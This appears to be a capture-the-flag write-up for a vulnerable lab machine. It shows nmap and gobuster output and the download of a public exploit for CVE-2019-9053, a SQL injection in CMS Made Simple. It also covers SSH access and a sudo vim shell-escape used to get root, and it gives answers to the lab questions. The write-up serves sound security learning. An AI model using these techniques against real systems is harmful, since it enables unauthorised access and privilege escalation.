┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.61.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 09:12 EDT
Nmap scan report for 10.10.61.2
Host is up (0.22s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.13.22.56
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.81 seconds
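As an added example (not part of the original writeup), a small Python parser for the port table above: it answers the first two questions at the end of the page (open services under port 1000, service on the highest port) and flags what a defender would escalate from this scan, namely anonymous FTP and SSH on a non-standard port; the scan excerpt is embedded as constructed input.

```python
import re

# Constructed excerpt of the nmap port table shown above (header, three port lines, ftp-anon line).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
"""

# One port line: "<port>/<proto> <state> <service> <version text...>"; script lines ('|') never match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
VERSION_TOKEN = re.compile(r"\d+(?:\.\d+)+[a-z0-9]*")  # first dotted version, e.g. 3.0.3 or 7.2p2

def parse_ports(text):
    """Return one dict per port line with the version number pulled out of the version text."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        v = VERSION_TOKEN.search(version)
        ports.append({"port": int(port), "proto": proto, "state": state,
                      "service": service, "product": version.strip(),
                      "version": v.group(0) if v else None})
    return ports

def count_below(ports, limit=1000):
    """Open services whose port number is under `limit` (question 1 below)."""
    return sum(1 for p in ports if p["state"] == "open" and p["port"] < limit)

def highest_service(ports):
    """Service name on the highest open port (question 2 below)."""
    open_ports = [p for p in ports if p["state"] == "open"]
    return max(open_ports, key=lambda p: p["port"])["service"] if open_ports else None

def findings(text):
    """Items from this scan a defender would want to fix or track in inventory."""
    notes = []
    if "Anonymous FTP login allowed" in text:
        notes.append("anonymous FTP login enabled")
    for p in parse_ports(text):
        if p["service"] == "ssh" and p["port"] != 22:
            notes.append(f"ssh on non-standard port {p['port']}")
        if p["version"]:
            notes.append(f"inventory: {p['service']} {p['version']} on {p['port']}")
    return notes
```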
Gobuster
┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.61.2/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.61.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/08 09:30:20 Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 309] [--> http://10.10.61.2/simple/]
We find a page running CMS Made Simple, which has a known CVE. We can try this exploit.
We download it to our Kali box: wget https://www.exploit-db.com/download/46635
Once we have the credentials, we can also check whether they work over SSH (remember to specify the port in your ssh command, because it is not on the default port 22):
ssh mitch@10.10.104.30 -p 2222
Privesc
Running sudo -l, we find that vim is allowed.
We can do this trick here: sudo vim -c ':!/bin/bash'. I just changed it to get a bash shell.
Questions
How many services are running under port 1000? Answer: 2
What is running on the higher port? Answer: ssh
What's the CVE you're using against the application? Answer: CVE-2019-9053. Reading the exploit, we understand that the app is vulnerable to a time-based SQL injection.
To what kind of vulnerability is the application vulnerable? Answer: SQLi
What's the password? I will let you find this on your own.
Where can you login with the details obtained? Answer: ssh
What's the user flag? I will let you find this on your own. Hint: cat user.txt
Is there any other user in the home directory? What's its name? Running ls /home, we find the user sunbath.
What can you leverage to spawn a privileged shell? Answer: vim
What's the root flag? I will let you find this on your own. Hint: cat /root/root.txt